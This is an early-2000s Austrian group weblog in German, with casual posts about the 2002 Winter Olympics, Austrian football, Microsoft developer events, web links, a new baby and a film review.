    so, da wir ja gestern endlich unsere zweite alpine goldene geholt haben, ist es nun wirklich an der zeit unseren blick mit ein bisschen häme gen westen zu richten. es ist nunmal so, dass viel druck auf der kleinen sonja nef lastet; wenn sie heut keine medaille holt, wird das wohl die erste winterolympiade ohne eine einzige eidgenössische alpinmedaille seit innsbruck 1964. ;-)
    hier nun ein kleiner überblick darüber, wie diese desaströse alpin-bilanz in den schweizer medien behandelt wird:
    blick (schweizer boulevard-zeitung), neue zürcher zeitung, sf drs, tagesanzeiger, ...
    ;-)))))
    :: seppl-rhetorik  sTe  21.02.2002 11:10:41
    ein wirklich amuesanter artikel mit wahrheitsgehalt...
    :: euro2008  sTe  19.02.2002 13:50:24
    soeben die bewerbungseite fuer die euro 2008 entdeckt (nein, die ist nicht von mir !!!); gratulation zur wahl der einpraegsamen adresse :)...
    wirklich nett ist hingegen das 5. produkt im merchandising bereich...
    :: easy sunday  sTe  17.02.2002 13:59:49
    added 5 pics of ´mia´ ; thinking and dreaming about the new appartment; reading this actionscript book; preparing for the olympia night,...
    :: superb piece of work  sTe  13.02.2002 15:50:49
    auf turbulence.org gibts ´the shape of song´ :
    What does music look like? The Shape of Song is an attempt to answer this seemingly paradoxical question. The custom software in this work draws musical patterns in the form of translucent arches, allowing viewers to see--literally--the shape of any composition available on the Web. The resulting images reflect the full range of musical forms, from the deep structure of Bach to the crystalline beauty of Philip Glass.
    phantastisch ist auch ´The Secret Lives of Numbers´ , which shows us the ´popularity´ and association of every integer between 0 and 100000. Awesome java demonstration.

    :: robbery  sTe  02.09.2002 16:10:53
    da mir ja irgendwelche ratzn, sowohl mein handy aus dem chelsea und vor zwei tagen auch noch mein autoradio gestohlen haben, tendiere ich wieder zur alten ansicht, dass wien sehr wohl ein teil des balkans ist (greetings rriot);
    auf jeden fall wurde heute das zweite produkt wuerdig ersetzt mit diesem mp3 faehigen teil; diebstahlgesichert, laut und formvollendet!
    :: feelolympia = online!  sTe  02.06.2002 15:19:41
    bis freitag noch in testphase, aber die bets werden schon angenommen:
    feelolympia
    gates future vision  sTe  02.05.2002 11:53:37
    feelosophee war ja gestern beim visual studio.net launch mit bill gates, und muss sagen, dass ich schon charismatischere speaker gehoert habe; ein wenig mehr euphorie haette dem vortrag nicht geschadet, aber vielleicht war er ja gezeichnet vom unmittelbar vorangegangenen treffen mit dem bundesschuessel...
    ansonsten gings um reliability, scalability und security, die mehr als nur als schlagworte herhalten sollten...
    following the olympic flame  sTe  02.01.2002 11:59:23
    die offizielle olympia site schenkt uns eine biografie unsres stephan eberharter und lehrt uns dass sein name folgendermasen ausgesprochen wird (SCHTEF-ahn AY-ber-har-ter), und weiters dass er ein metallica fan ist.
    die volksstimme?  babs  31.01.2002 14:17:23
    "Alt-F4 - Ausstieg aus der Windows-Einbahnstrasse", "Freiheit fuer Daten durch offene Software", "Linux statt Windows" und "Enteignet Gates" sind einige der geistreichen schlachtrufe der KPOE, die anlaesslich bill gates wien-besuch am kommenden montag zum widerstand aufruft. "Wir werden die Gelegenheit nutzen, um Billy-Boy zu zeigen, dass es Schlimmeres gibt als leckere Torten im Gesicht", meint der sprecher der 0.48% partei in einer aussendung. nach ansicht der KPOE ist bill gates "Symbolfigur eines Wirtschaftssystems, das weltweit fuer Hunger, Elend und Tod verantwortlich ist".
    ich wusste garnicht dass es die noch gibt :)!
    last monday in jan  sTe  28.01.2002 09:54:21
    silicon.com entwickelt die Pub-detecting watch;
    und auf remix.kwed.org kann man sich god old c64 sounds nachgespielt und remixed anhoeren...
    u-bahn fahren in wien ist ansich ja schon abstossend genug, aber muss das jetzt auch noch sein ?!?
    :: mixed up 2  sTe  24.01.2002 10:10:13

    Microsoft - HOWTO: RTFM
    faked or real it really does let the feelings of most IT admins and techs known to the world...

    der meistgesuchte begriff auf lycos in den letzten tagen ist Chu Mei-Feng. die story der armen taiwanesischen Politikerin findet man auf bbc. (via henso)
    ::mixed up  sTe  23.01.2002 11:31:36
    auf Bloede Namen gibts sogar eine oesterreicher sektion (via p3k);

    und HAPPY BIRTHDAY SALLY !!!
    wie rein seid ihr?  romario11  22.01.2002 15:30:59
    habe gerade den purity test absolviert. das sind 100 kleine fragen (ja ja ja, heute ist es ganz gemütlich im büro...) welche mit fortschreiten des tests immer abartiger werden. z.b. "did you ever have oral sex while defacating?" ;))

    na ja, jedenfalls bin ich halbwegs pure (45%) und daher noch nicht vollends der hölle geweiht. dass 86% der anderen 9,7 mio. test absolventen purer sind als ich, das ist eine andere geschichte... nettes feature: durch eingabe der e-mail adresse erfährt man die test resultate von freunden - he he
    auch wenns eh schon alle wissen...  romario11  22.01.2002 14:00:50
    der hanseee versucht als nächster sein glück im land der 7 millionen teamchefs.

    heissen wir unseren hanseee (der uns soizbuagan sowohl als spieler als auch als trainer schon grosse freude bereitet hat) also willkommen und wünschen wir ihm viel glück bei dieser schwierigen aufgabe. aber nachdem er bereits die "task force" unter task commander beppo mauhart überzeugen konnte und die bundesliga auch voll hinter ihm steht, scheinen zumindest die organisatorischen gegebenheiten o.k. zu sein.

    auch wenn der hanseee bua vielleicht an seinen bisherigen trainerstationen letztendlich nicht voll überzeugen konnte, so hat man doch immer gemerkt, dass er - wie man so schön sagt - "das feuer in einer mannschaft entfachen" kann. darin ist er gut, das hat man ganz deutlich während seiner zeit in lehen gespürt. und wenn nationalspieler mehr als das brauchen (z.b. schulunterricht in sachen disziplin, technik und taktik) dann ist ein solches nationalteam auch keiner teilnahme an internationalen meisterschaften würdig.

    ois guade hanseee, welcome back to business und auf nach Portugal 2004 !!!
    :: out now (auswaertsspiel)  sTe  21.01.2002 16:14:17

    schwestern!  babsi  20.01.2002 17:58:28
    wie format in seiner aktuellen ausgabe berichtet, soll die oesterreichische mobilfunktochter der deutschen telekom, max.mobil, ab 2002 wie seine deutsche schwester - "T-Mobile" heissen.
    die umbenennungsaktion der max.mobil in die t-mobile marke trifft nun nicht nur die werbebranche, die sich schon sabbernd auf den aufbau einer neuen marke freut, sondern auch mitten ins herz des heimischen fussballs. puenktlich zu beginn der fruehjahrsmeisterschaft, soll aus der blau-orange-farbigen max.bundesliga die rosa t-mobile-liga werden. da kommt doch freude auf, oder? :)
    ::new experiment !!!  sTe  18.01.2002 14:38:08

    der artalyzer ist fast fertig!!!
    muss nur noch fuern mac angepasst werden...
    bugreports bitte mailen!!!
    online radio 4 online working/surfin  sTe  16.01.2002 15:24:52
    hier mal eine auflistung von meiner meinung nach aeusserst guten unterhaltsamen und nuetzlichen online radio stations:

    mtv.radio (ca 20 stations...von indie 120 minutes ueber die besten cover versionen)
    nme.radio gemischtes angebot; note: sehr gut

    more to come...
    bzw: bitte alternativ vorschlaege sind erwuenscht...
    male pregnancy  sTe  16.01.2002 13:57:34
    I really have to share this link (via 13thparallel);
    oarges design auf tv.orf :))
    aber wenigstens mit live bildern
    small updates...  sTe  02.11.2002 00:50:13
    ab sofort wird auch das jeweilige gewaehlte color-feeling gespeichert; (fuer alle dies noch nicht gemerkt haben: ganz rechts oben befindet sich folgender colorbar: )

    so, whats your favourite color...
    bzw: fuer alternative farbvorschlaege bin ich gern zu haben
    gyrotwister  sTe  01.10.2002 10:31:14
    soeben ist das neue ultimative trainingsgeraet eingetroffen: der gyrotwister!!!
    ein 200gr schwerer Rotor wird nur durch muskelkraft in schwingung gesetzt und bringt so einen bis zu 15kg hantelersatz...
    zur zeit summt und surrt es auf jedem arbeitsplatz; kostenpunkt ca 16 euro;
    feelosophee loves it !!!
    Vorgestellt: Die häßlichste Nachttischlampe der Welt  romario11  01.09.2002 14:00:22
    Man glaubt es kaum, aber den Apfelverkäufern fällt immer wieder etwas neues ein, um einem Gerät ein doofes Design zu verpassen.

    Hatte man sich bisher damit begnügt, die infantilen Gene der Klientel durch Verkleidung der Ware als Kinderspielzeug voranzutreiben, steigt Apple jetzt in den Nischenmarkt der elektronischen Inneneinrichtungsgegenstände ein. Herausgekommen ist dabei aber kein großer Wurf (wie nebenstehendes Symbolfoto zeigt), sondern die schiachste und wahrscheinlich teuerste Nachttischlampe der Welt.

    Einziger Kaufanreiz für Nachttischlampeninteressierte dürfte der Umstand sein, durch die Investition von ca. EUR 2.600,- die wohl einzige Nachttischlampe der Welt zu besitzen, die auch DVDs brennen kann...

    Na dann, viel Glück Steve!
    Nur noch ca. ein Monat...  bully  02.07.2002 00:07:05

    ... und schon kommt wieder ein sportliches Grossereignis in unsere Wohn- und Schlafzimmer:

    SALT LAKE CITY 2002!!!

    Hier nun schon mal die wichtigsten Termine:

    10. Feb., 03:00Uhr: EISHOCKEY: OESTERREICH - LETTLAND
    10. Feb., 16:30Uhr: SCHISPRINGEN K90 Einzel
    10. Feb., 18:00Uhr: HERREN ABFAHRT
    10. Feb., 24:00Uhr: EISHOCKEY: OESTERREICH - DEUTSCHLAND
    11. Feb., 18:00Uhr: DAMEN ABFAHRT
    12. Feb., 24:00Uhr: EISHOCKEY: OESTERREICH - SLOWAKEI
    13. Feb., 16:30Uhr: SCHISPRINGEN K120 Einzel
    13. Feb., 18:00Uhr: HERREN KOMBINATION
    14. Feb., 16:30Uhr: NORD. KOMBINATION, Mannschaft, Springen
    14. Feb., 18:00Uhr: DAMEN KOMBINATION
    15. Feb., 17:00Uhr: NORD. KOMBINATION, Mannschaft, Langlauf
    16. Feb., 18:00Uhr: HERREN SUPER-G
    17. Feb., 18:00Uhr: DAMEN SUPER-G
    18. Feb., 16:30Uhr: SCHISPRINGEN K120 Mannschaft
    20. Feb., 18:00Uhr: DAMEN SLALOM
    21. Feb., 18:00Uhr: HERREN RIESENTORLAUF
    22. Feb., 18:00Uhr: DAMEN RIESENTORLAUF
    22. Feb., 20:00Uhr: EISHOCKEY: SEMIFINALE 1
    23. Feb., 00:15Uhr: EISHOCKEY: SEMIFINALE 2
    23. Feb., 18:00Uhr: HERREN SLALOM
    24. Feb., 21:00Uhr: EISHOCKEY: FINALE

    wird sicher scheeeen!!!!!!!
    und sie komme alle wieder...  sTe  01.07.2002 17:39:29
    rapid hat ihren herzog, und wir ham unseren baric wieder; zwar als sportdirektor - aber die kompetenzen dieser position sind ja bei jedem club mehr oder weniger auslegungsache;

    bleibt abzuwarten wie sich die dinge nun entwickeln, baric ist ja nicht wirklich als eine teamfaehige figur bekannt....
    ::: mia ::: °2  sTe  01.07.2002 15:40:09
    wir gratulieren zur ersten lebenswoche; und als geschenk von meinen arbeitskollegen haben wir schon eine eigene domain: www.mia.to auf den wunderschoenen tonga islands bekommen :)
    na dann "Malo e lelei - Warm welcome to the Friendly Islands."
    ::: mia :::  sTe  01.06.2002 10:52:29
    da feelosophee am 31.12 nachwuchs bekommen hat, ist die berichterstattung in den letzten tagen eher duenn ausgefallen;
    aber wer auch immer unsere mia gesehen hat, wird absolutes verstaendnis dafuer haben...
    ps: wir sind uebergluecklich und allen geht es hervorragend
    new site online!!!  sTe  29.12.2001 10:54:56
    in einer blitzaktion wurde folgende site von nofro fertiggestellt: Salzburg 2010 !!! dass mir der inhalt ebendieser es besonders angetan hat, versteht sich glaub ich von selbst...
    BLiX  bully  27.12.2001 23:50:11
    ich weiss ja nicht, aber mir kommt Level 221 bei BLIX unloesbar vor...
    vielleicht kann mir wer weiterhelfen...
    das Passwort fuer dieses Level lautet "MIKEY"...
    aber wahrscheinlich interessiert das hier eh niemanden ausser mich... :-(
    excellent...  sTe  27.12.2001 18:38:13
    sind seit mittag voll auf ´Return to Castle Wolfenstein´ reingekippt;
    wahnsinniger first person shooter der extraklasse!!! bis jetzt 6h durchgespielt, fast paranoia :))
    feelosophee inside  sTe  25.12.2001 11:47:55

    grandiose neuerung auf feelosophees arbeitsplatz; man beachte das teil am rechten rand:



    ab jetzt ist fuer erfrischung jeglicher art gesorgt...
    * * * * MeRrY xMaS !!! * * * *  sTe  23.12.2001 08:02:55

    no comment...  sTe  21.12.2001 12:49:12


    exploding cds?  sTe  16.12.2001 23:20:05
    strange things are happening, zumindest laut
    der University of St Andrews: explodierende cds

    na dann, sylvester kann kommen :)

    spitze ist auch diese catapult watch...
    heute ist ein schoener tag!  sTe  14.12.2001 17:38:42

    das web standards project kurz WaSP schliesst seine pforten; nach jahrelangem kampf fuer einen gemeinsamen nenner im browserwar, ist die unterstuetzung der empfohlenen standards in den neuesten browsern so weit, dass die mission im großen und ganzen als erfuellt gelten kann.
    der ´alte´ netscape pfeift aus dem letzten loch und ist bis auf seine letzten zuckungen tot (auch die deutschen werns ueber-zuck!!!-ern muessen angesichts der weltweit einzigartigen noch 10% verwendung des klumperts in piefkinesien), ie6, ns6 und opera beherrschen weitgehend css und dom!
    sofern es dann auch der letzte kunde kapiert hat, kann auf downlevel browser kompatibilitaet weitgehend verzichtet werden, bzw durch eine ´graceful degradation´ abgedeckt werden.

    bleibt zu hoffen dass die zeitspanne nicht mehr allzu lang dauert, und wir endlich vernuenftig coden koennen...
    Jetzt wirds ernst; wirds jetzt ernst?  bully  13.12.2001 19:50:02

    In den letzten Tagen hat das US-Justizministerium in der warez-Szene ordentlich aufgeraeumt. Unter den Namen Operation Buccaneer und Operation Bandwidth wurden gestern und vorgestern weltweit ueber hundert Mitglieder diverser warez-Foren, sogenannte Digital Piratez, verhaftet. Besonders betroffen ist hier die russische Group Drink or Die. Alle Admins sind verhaftet und die Site ist natuerlich down. Weitere Infos zu den Aktionen gibts hier: Heise, Washington Post, CNN, Netbytes...
    Bisherige Online-Folgen:
    TUBS, HSG, RTiSO, RT, iNSiGHT (rls group), EchoBase, FBi, RHiSO, HO, chevelle´s site, TEN, AF1, PBL, BAN, MT, PWH, BNS, DWS, HW, BR, TWH, FE, LOF, PS, DOD und viele, viele mehr sind schon down! Viele weitere werden folgen.
    Members aus den USA (auch Mitarbeiter der University of Massachusetts, Stanford, der UCLA usw.), Kanada, Russland, Grossbritannien, Finnland, Norwegen und Australien wurden verhaftet und haben mit Haftstrafen zwischen drei und fuenf Jahren zu rechnen.
    Surfer, die sich zum Zeitpunkt der Durchsuchung auf einem der inkriminierten Warez-Server aufhielten, wurden freundlich, aber bestimmt zu einer Presseerklaerung des US-Justizministeriums umgeleitet.... ;-)
    let it snow...  sTe  12.11.2001 11:20:46

    call mulder and scully !!! na endlich, lang hats gedauert bis so ein schmarrn auftaucht :)
    und google eroeffnet das 20 Year Usenet Archive now available - keine schlechte sache nicht;
    Building a megapixel digital camera from a flatbed scanner - na ich weiss nicht?!
    und weils heute schneit: die geburt des weihnachtsmanns aus dem geist der werbung
    Am Zentralfriedhof ist Stimmung wia sei Lebtog no net woar  babsi  12.08.2001 21:45:36
    Wie dieser Tage das Bezirksjournal Simmering berichtete, zelebrieren seit geraumer Zeit einige Auhirsche am Zentralfriedhof naechtliche Dinnerorgien. Was tun? Her mit Heer! Oesterreichs Soldaten, immer für den Ernstfall vorbereitet, werden die Graeber kuenftig mit Rasseln, Megaphonen und Scheinwerfern verteidigen – geschossen darf freilich nicht werden. Auf unsere Burschen in gruen ist halt verlass :)!
    bush & more..  sTe  12.07.2001 14:10:30
    mittwoch gasometer phantastisches bush konzert; ein wenig zu kurz aber trotzdem superb; dieser review gibts kaum was hinzuzufuegen;
    heute simmeringer heide; auto ausloesen aus den klauen der ma48 (grrrrrrrrrrr)!!!

    Beatallica - Beatles tunes, done Metallica style;
    und da sich ja neuerdings einige user hier mehr oder weniger befetzen, etwas zum abreagieren :)
    Aerger artikulieren...  bully  12.04.2001 19:27:02
    Womoeglich ist dies hier nicht der optimale Rahmen, aber ich muss jetzt einfach mal irgendwo meinen Aerger artikulieren!!!
    Warum und wieso ist es immernoch moeglich, dass Sharon und seine Schergen Wohnviertel, Schulen und Krankenhaeuser in Gaza-Stadt und Ramallah bombardieren, ohne dass UNO oder die USA laut aufschreien, diesen Kerl endlich in seine Schranken weisen und an den Verhandlungtisch zurueckschicken???
    Bin echt wuetend!!!
    Jeder unschuldige Tote ist zu viel!!! KINDER ERSTRECHT!!!
    INDEED! launch !!!  sTe  12.04.2001 16:47:55
    babsis corporate site ist seit 16.00 online !!!
    indeed - your communication network.

    toi-toi-toi
    Fussballstadien und was da noch auf uns zukommt  bully  12.01.2001 14:45:10
    Seit ein paar Tagen werden bei uns diverse Stadien-Neubauten diskutiert, deshalb jetzt hier mal ein paar Beispiele.
    Die zur Zeit groessten Projekte in Europa:
    Das neue Wembley-Stadion, wird - wie es bis jetzt aussieht - sicher ein traumhaftes Fussballstadion.
    Das neue Stadion in Muenchen, bzw. die Kandidaten, findet man hier, die Entscheidung ueber den Sieger gibt’s ja erst am 8. 2. 2002, hier jedenfalls der momentane Favorit; die Aussenansicht find ich echt uebel, entscheidend ist aber eh die Innenansicht und diesbezueglich ist leider noch nirgends etwas zu finden. Leider nicht mehr gebaut wird deshalb, die Loewenarena, die mir sehr gut gefallen haette.
    Ein weiteres Grossprojekt, ist das neue Stadion von Benfica, das ja immerhin in 2,5 Jahren auch ein EM-Finale sehen wird. Auch dieses Projekt erscheint mir sehr gelungen.
    Ein Traum natuerlich, anscheinend nicht nur fuer die Zuschauer sondern auch fuer die Spieler: die neue Arena auf Schalke!!!
    Weiters sehr schoen; die AOL-Arena des HSV.
    Nun zu den kleineren Vertretern:
    Bis jetzt schaut das neue Salzburger Stadion ganz nett aus, vielleicht ein bisschen klein, aber bitte...
    Ein sehr schoenes neues Stadion hat z.B. auch der FC Basel. Die offizielle Vereins-Homepage ist uebrigens auch recht gelungen, wie ich finde.
    Nicht wirklich klein, aber halt auch nicht so gross, dafuer umso schoener: die neue Heimstaette des FC Newcastle United. Congrats, boys!!!
    Ach ja, das groesste Stadion der Welt, das Mayday-Stadion, steht uebrigens in Pyoengyang, Nordkorea und hat exakt 150.000 Sitzplaetze.
    Macht einem doch den Mund waessrig, oder? ;-)
    die wuchtel  babsi  30.11.2001 15:51:29
    adidas hat heute, 24 stunden vor der endrundenauslosung, fevernova praesentiert. nach 24 jahren trennt sich adidas vom traditionellen tango-design und wartet mit einem voellig neuen aeusseren auf. also wenn die deutschen so lange gewartet haben um dann dieses ding zu praesentieren, na gratulation! goldene, rote und gruene dreiecke die eine turbine darstellen, stellvertretend für die technischen errungenschaften der gastgeberlaender - bravo. meines wissens wurde die turbine zwar von kaplan erfunden, aber vielleicht haben die japaner ja ihre eigenen asiatischen varianten davon gebaut. jedenfalls soll das leder praeziser sein als je zuvor, so das ergebnis von satten 4.800 tests – waehrend ihr zu den austragungszeiten arbeitet, werde ich mir dann ansehen ob da wirklich was dran ist, an der neuen wuchtel :)!
    grandios !!!!  sTe  29.11.2001 11:21:13

    das showcomments script

    follow the instructions !!!
    tooltime  sTe  28.11.2001 23:56:00
    auch wenn herr bull wieder davon abraet ebensolches nicht nachzubauen so gefaellt mir der BBQ PC doch recht ausserordentlich;
    fuer alle flossen fetischisten der absolut unverzichtbare Fish Name Translator;
    und jetzt der kick off zum "hello World" contest: wer findet eine hier noch nicht vertretene sprache und das dazugehoerige beispiel...

    27. november - geschichte  babs  27.11.2001 11:57:39

    1942 - Birthday Jimmi Hendrix, Seattle
    1971 - Eroeffnung der ersten Fußgaengerzone in der Wiener Innenstadt (Graben).
    1981- Der AKH-Prozess endet mit der Verurteilung aller Angeklagten.
    1990 - Appenzell-Innerrhoden muss nach einem Urteil des Schweizer Bundesgerichts in Lausanne das aktive und passive Frauenwahlrecht auf kantonaler und kommunaler Ebene zulassen.
    DevDays  sTe  26.11.2001 23:46:15
    heute (und auch morgen) lud microsoft wie alle jahre zu den Developer Days. heuer sogar mit mr. ´CLR´ Don Box als special guest. aber diesmal hats der developmentor wohl ein wenig uebertrieben und sich ziemlich im detail verloren; unterhaltsam wars trotzdem! mal schaun was wir morgen mitnehmen werden...auf jedenfall mal den rc vom visual studio.net
    die versprochenen 2,847.588 neuen gehirnzellen werns wohl nicht ganz werden :)
    |H|A|P|P|Y| |B|I|R|T|H|D|A|Y|  sTe  23.11.2001 11:01:57

    to you babsi !!!

    and also to toni !!!
    art and celebs  sTe  22.11.2001 17:19:18
    wonderfull barcode - art;
    for all americans: HAPPY TURKEY DAY !!!
    and HAPPY BIRTHDAY to hannes !!!
    useless link for all cheesefreaks; and check out zentences...
    PixelPerson is bloody nice too!!!
    monday morning....  sTe  19.11.2001 10:37:12
    um die montag morgenstimmung ein wenig anzukurbeln gibts hier ein cooles race.
    und hier kann man handys pingen.
    und was tragisch-schweinisches auf orfon
    was gesundes...  sTe  15.11.2001 16:28:11
    mein juengstes nofro projekt ist endlich online gegangen: die deutsche krebsgesellschaft. knock knock knock!
    vom winde verweht...  sTe  14.11.2001 22:40:05
    ...wenn es nicht so traurig waere, sicher eine der besten ausreden; natuerlich hat auch kaum einer der oesterr. auswahl eine adaequate leistung gebracht, jedoch verdient lediglich einer das praedikat "unfaehigster-voll-loser" !!! oft (von seegerschen mostgeschwaengerten geistesblitzen) zitierter "super mario" ist alleinig verantwortlich fuer die nicht teilnahme an der wm!!! fuer das peinliche ergebnis muss "er-wars" jedoch nicht herhalten: das hat die allseitsbekannte mentalitaet unserer besten kicker kollektiv erledigt! traurig aber wahr! letztendlich gibt es keine ausreden, und schon gar nicht den wind!
    vor allem dann nicht wenn dieser in die entgegengesetzte richtung geblasen hat (wie man an den trikots verfolgen konnte) was super-versager mario als rechtfertigung angab! ueber dessen intelligenz brauche ich kein wort mehr zu verlieren! vielen dank du ei !!!!

    zum abschluss noch was aus dem iran
    ja hamma denn heut scho wm??  romario11  13.11.2001 20:38:04
    ich weiss, ich habe hie und da behauptet, ich wäre an der kommenden wm gar nicht so interessiert... so weit ist sie auch noch entfernt (geographisch), so mühsam sind die übertragungszeiten... und überhaupt: a wm bei denen asiaten, des ist ein widerspruch in sich selbst.

    tja, offenbar habe ich nicht mit der natur eines Romario11 gerechnet. und so kam es heute wie es kommen musste. mitten im grössten stress überkamen mich plötzlich und völlig unerwartet wallungen, ich war seltsam desorientiert und meine gedanken drehten sich schliesslich nur mehr um runde bälle (aus leder!! ein schmutzfink wer sich andres denkt...). schnell hatte ich herausgefunden was da mit mir geschah: eine klassische fussballfieberattake!! au mann, das geht aber diesmal schon früh los. auf einmal war mir völlig wurscht wer da morgen gegen wen spielt und siegt, wer fahren darf und wer nicht. am ende meldete mein gehirn nur noch: argentinien, paraguay, england, mexiko, italien und nigeria sind fix - was kann da noch für das fussballherz schiefgehen. alles weitere wäre höchstens ein zuckerguss für die vorrunde. auch ohne österreich wirds wie immer ein wahnsinns spektakel!!! daher musste ich mir sofort die genauen spieltermine ansehen und bin auch fündig geworden. am schönsten hat sie meiner meinung nach ein fussballfreund auf seiner privaten homepage im spielplan dargestellt (einfach und sachlich). Aber auch der offizielle der veranstalter ist was für feinschmecker (allerdings typisch japanisch und man wird wohl einen p4 brauchen um die infos ordentlich verarbeiten zu können...;)) )

    aus beiden lässt sich entnehmen, dass es viele 15:30 spiele gibt, welche zum frühstück um 7:30 unsere zeit bis perfekte 9:15 dauern, womit diese partien schon gesichert wären. und die abendspiele um 20:30 werden halt in einer ausgiebigen mittagspause ab 12:30 genossen!!! ich schlage wie in guten alten zeiten herrn bulls und meine bleiben als konspirative treffen der wm-zellen vor!!!

    auf gehts, zur wm sinds nur noch wenig mehr als 6 monate. ich schlage vor, die termine in den feelofax einzutragen, sobald bekannt ist wer gegen wen spielt. so long, Romario11 in feever again!!!
    rainy days  sTe  13.11.2001 16:02:43
    sehr trocken gehts bei den oesterreich wochen zu,
    teilweise gar nicht schlecht;
    und hier ist der startschuss zum cursor race: ready-set-go!!! (rec:14.1 sec)
    not just for the boys!  babsi  12.09.2001 02:11:18
    der pirelli-kalender 2002 ist heraussen - ich bin positiv ueberrascht!
    ...  sTe  11.09.2001 14:33:57
    trashig und flashig!!!

    aus der reihe "do-it-yourself" heute das kapitel "how to clean your harddisk" ; no guarantee provided ...
    fuer grufties duerfte diese wer-liegt-wo site interessant sein
    stierwoscha oder sturschaedln :)?  babsi  11.07.2001 18:09:24
    die sechs umts-mobilfunkbetreiber steigen gegen behinderungen beim netzausbau auf die barrikaden - endgueltiger ausloeser dafuer ist salzburg. was bisher noch niemand geschafft hat, ist nun salzburg gelungen: zum ersten mal wandten sich mobilkom, max.mobil, one, tele.ring, hutchison und telefonica gemeinsam in einer pressekonferenz an die oeffentlichkeit und warnten eindringlich vor den folgen "ungesetzlicher sowie politisch motivierter grenzwertforderungen". vor allem die wirtschaftlichen folgen fuer die gesamte branche seien nicht absehbar. wenn sich nichts aendert, wird salzburg ganz rasch zur handyfreien zone, so der einheitliche tenor. "geht die entwicklung so weiter, wird man in salzburg ausser haus kuenftig nur noch mit deutschen netzen zu teuren roamingpreisen mobil telefonieren koennen" meinte heute der chef der max.mobil.
    was sich da genauer abspielt kann man hier auf pte nachlesen!
    An die Herren Bush, Blair, Schroeder, ...  bully  11.06.2001 21:45:45

    Der Schnee leis stäubend vom Himmel fällt,
    Ein Reiter vor Dschallalabad hält,
    "Wer da!" - "Ein britischer Reitersmann,
    Bringe Botschaft aus Afghanistan."

    Afghanistan! Er sprach es so matt;
    Es umdrängt den Reiter die halbe Stadt,
    Sir Robert Sale, der Kommandant,
    Hebt ihn vom Rosse mit eigener Hand.

    Sie führen ins steinerne Wachthaus ihn,
    Sie setzen ihn nieder an den Kamin,
    Wie wärmt ihn das Feuer, wie labt ihn das Licht,
    Er atmet hoch auf und dankt und spricht:

    "Wir waren dreizehntausend Mann,
    Von Kabul unser Zug begann,
    Soldaten, Führer, Weib und Kind,
    Erstarrt, erschlagen, verraten sind.

    Zersprengt ist unser ganzes Heer,
    Was lebt, irrt draußen in Nacht umher,
    Mir hat ein Gott die Rettung gegönnt,
    Seht zu, ob den Rest ihr retten könnt."

    Sir Robert stieg auf den Festungswall,
    Offiziere, Soldaten folgten ihm all´,
    Sir Robert sprach: "Der Schnee fällt dicht,
    Die uns suchen, sie können uns finden nicht.

    Sie irren wie Blinde und sind uns so nah,
    So lasst sie´s hören, dass wir da,
    Stimmt an ein Lied von Heimat und Haus,
    Trompeter blast in die Nacht hinaus!"

    Da huben sie an und sie wurden´s nicht müd´,
    Durch die Nacht hin klang es Lied um Lied,
    Erst englische Lieder mit fröhlichem Klang,
    Dann Hochlandslieder wie Klagegesang.

    Sie bliesen die Nacht und über den Tag,
    Laut, wie nur die Liebe rufen mag,
    Sie bliesen - es kam die zweite Nacht,
    Umsonst, dass ihr ruft, umsonst, dass ihr wacht.

    Die hören sollen, sie hören nicht mehr,
    Vernichtet ist das ganze Heer,
    Mit dreizehntausend der Zug begann,
    Einer kam heim aus Afghanistan.


    (Theodor Fontane, Das Trauerspiel von Afghanistan)
    star wars  babs  11.06.2001 15:27:40
    den trailer zu star wars episode II: attack of the clones kann man sich nun endlich ansehen.
    beim oeffnen des links gibts irgendein problem, mit ie6 jedenfalls! man muss die seite allerdings nur refreshen, dann passts!
    da scheint wohl wieder einmal ein wurm im apfel zu sein :)
    cold war and more...  sTe  11.06.2001 11:19:58
    wisenut ist eine neue search engine mit ´sneak a peak´ funktion,...
    auch google testet aehnliches....

    und eine nette geschichte aus der zeit des kalten krieges; believe it or not...
    filmosophee  romario11  11.05.2001 10:59:36
    liebe freunde,

    nach längerem grübeln, was ich denn zu unser aller liebsten homepage beitragen möchte, habe ich mich für "filmosophee" entschieden. erstens, weil es bisher noch nicht viel zu aktuellen oder vergangenen filmen zu lesen gab, und zweitens, weil in der mailing list ohnehin genug über politik diskutiert wird, daher mein geplantes "manifest" ohnedies stückerlweis rüberkommt.

    ich werde also hier von zeit zu zeit etwas über filme schreiben, meine auswahlkriterien sind simpel und einfach wie mein weithin bekannter cineastischer geschmack: gesehen muss ich das piece haben und lust zum schreiben muss ich haben. dann geht´s schon los.

    filmosophee 101: "Proof of Life" (2000, Regie: Taylor Hackford)

    der streifen war, glaube ich, diesen frühling oder sommer in unseren kinos zu sehen. ich habe ihn mit völliger ignoranz als "der neiche do mim mel gibson" in meinem hirn als second choice abgelegt und andere meisterwerke wie "The Mummy Returns" oder "Planet of the Apes" vorgezogen. nun geriet dieser streifen über das heilige internet in meine hände und ich war ziemlich überrascht: "der is jo goar ned mim mel gibson..." sondern mit gladiator Russel Crowe. die handlung ist einfach: frau (Meg Ryan) engagiert vollblutprofi negotiator (Russel Crowe) mitsamt vollblutprofi antiterror kommando, um ihren architekten-gatten (David Morse) aus der geiselhaft von guerrillia kämpfern in irgendeinem (ungenann-ten)südamerikanischen land zu befreien. das nenn ich ehrlich! und es kracht auch gehörig, das kann ich euch sagen. das eigentlich coole an dem film ist aber, dass die korrupte atmo-sphäre in dem land, die jeweilige stimmungslage der handelnden personen und an den verschiedenen schauplätzen perfekt zum zuseher transportiert wird. jeder, der schon einmal in zentral- oder südamerika unterwegs war, wird unweigerliche déjà-vu erlebnisse der gefühlstechnischen art haben. einfach spitzenklasse. von dieser atmosphärischen darstellung lebt auch die spannung, die behutsam bis zum grande finale aufgebaut wird und bis zur letzten minute nicht nachlässt. gibt es auch nicht allzu oft im action genre. auch die liebe-sturtelei zwischen Crowe und Ryan hält sich in absolut erfreulichen grenzen und bleibt lediglich angedeutet. insgesamt war der film ein amüsantes erlebnis und eine positive überraschung, bedenkt man, dass er ja nicht allzu viel aufsehen erregt hat, als er in die kinos kam. in nebenrollen spazieren übrigens David Caruso und good old Gottfried John über die leinwand. three thumbs up!
    good old computer times...  sTe  11.04.2001 13:58:26
    endlich einen sehr guten c64 emulator gefunden um die alten (anfangs) zeiten wieder aufleben zu lassen.
    und das gute daran ist, es gibt auch (fast) alle spiele roms dafuer...
    mein favorite von damals war und ist ´paradroid´...

    and here the mame song...
    rearrange...  sTe  11.03.2001 14:42:42



    nach laengerer ueberlegung endlich die optimale raumausnutzung gefunden...puh*
    happy 1st birthday feelosophee !!!  sTe  11.01.2001 12:58:48

    Professor claims Robin Hood was gay  sTe  31.10.2001 15:52:35
